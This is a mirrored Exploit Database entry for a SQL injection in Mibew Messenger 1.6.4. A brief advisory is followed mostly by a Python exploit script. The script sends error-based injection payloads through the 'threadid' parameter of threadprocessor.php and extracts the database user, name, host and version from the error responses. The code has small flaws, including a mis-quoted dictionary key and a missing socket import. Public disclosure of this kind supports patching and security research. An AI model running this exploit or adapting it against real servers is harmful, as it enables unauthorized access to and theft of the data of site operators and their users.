Mibew Messenger 1.6.4 – ‘threadid’ SQL Injection

• Exploit Database
• 113 阅读

• 作者： Ucha Gobejishvili
  日期： 2012-08-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37582/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117

  source: https://www.securityfocus.com/bid/54857/info   Mibew Messenger is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.   A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.   Mibew Messenger 1.6.4 is vulnerable; other versions may also be affected.   #!/usr/bin/python #Author: Ucha Gobejishvili #Timeline: 2012-08-05 Bug Discovered #2012-08-05 Public Disclosured #Vendor: Mibew Web Messenger (http://mibew.org/ ) #Version: Mibew Messenger 1.6.4 #Demo: http://demo.mibew.org #Introduction: #Mibew Messenger (also known as Open Web Messenger) is an open-#source live support application written in PHP and MySQL. It #enables one-on-one chat assistance in real-time directly from #your website.   #Abstract:   #Discovered SQL injection Vulnerabilities on the Mibew Messenger #v.1.6.4. A SQL Injection vulnerability is detected on the Mibew #Messenger v.1.6.4 The vulnerabilities allows an remote attacker #to execute own sql commands on the affected applicationdbms. #Successful exploitation can result in dbms, web-server or #application compromise. # python Mibew.py -p localhost:8080 -t localhost:8500 -d /Patch/   import sys, httplib, urllib2, urllib, re from optparse import OptionParser   usage = "./%prog [<options>] -t [target] -d [directory]" usage += "\nExample: ./%prog -p localhost:8080 -t localhost:8500 -d /coldcal/"   parser = OptionParser(usage=usage) parser.add_option("-p", type="string",action="store", dest="proxy", help="HTTP Proxy <server:port>") parser.add_option("-t", type="string", action="store", dest="target", help="The Target server <server:port>") parser.add_option("-d", type="string", action="store", dest="directory", help="Directory path to the CMS") (options, args) = parser.parse_args()   def banner(): print "\n\t| ----------------------------------------------------------- |" print "\t|Mibew Web Messenger SQL Injection Vulnerability|" print "\t| |\n"   if len(sys.argv) < 5: banner() parser.print_help() sys.exit(1)   def getProxy(): try: pr = httplib.HTTPConnection(options.proxy) pr.connect() proxy_handler = urllib2.ProxyHandler({&apos;http&apos;: options.proxy}) except(socket.timeout): print "\n(-) Proxy Timed Out" sys.exit(1) except(),msg: print "\n(-) Proxy Failed" sys.exit(1) return proxy_handler   def setTargetHTTP(): if options.target[0:7] != &apos;http://&apos;: options.target = "http://" + options.target return options.target def getRequest(exploit): if options.proxy: try: proxyfier = urllib2.build_opener(getProxy()) check = proxyfier.open(options.target+options.directory+exploit).read() except urllib2.HTTPError, error: check = error.read() except socket.error: print "(-) Proxy connection failed" sys.exit(1) else: try: req = urllib2.Request(options.target+options.directory+exploit) check = urllib2.urlopen(req).read() except urllib2.HTTPError, error: check = error.read() except urllib2.URLError: print "(-) Target connection failed, check your address" sys.exit(1) return check   basicInfo = {&apos;user: &apos;:&apos;user_name()&apos;, &apos;name: &apos;:&apos;db_name()&apos;, &apos;hostname: &apos;:&apos;host_name()&apos;,&apos;version: \n\n\t&apos;:&apos;@@version&apos;}   def basicSploit(info): return "/operator/threadprocessor.php?threadid=1+and+1=convert(int," + info + ")--"   if __name__ == "__main__": banner() options.target = setTargetHTTP() print "(+) Exploiting target @: %s" % (options.target+options.directory) if options.proxy: print "\n(+) Testing Proxy..." print "(+) Proxy @ %s" % (options.proxy) print "(+) Building Handler.."   for key in basicInfo: getResp = getRequest(basicSploit(basicInfo[key])) if re.findall("the nvarchar value &apos;", getResp): dbInfo = getResp.split(&apos;the nvarchar value &apos;&apos;)[1].split(&apos;&apos; to data type int&apos;)[0] print "\n(!) Found database %s%s" % (key, dbInfo.rstrip())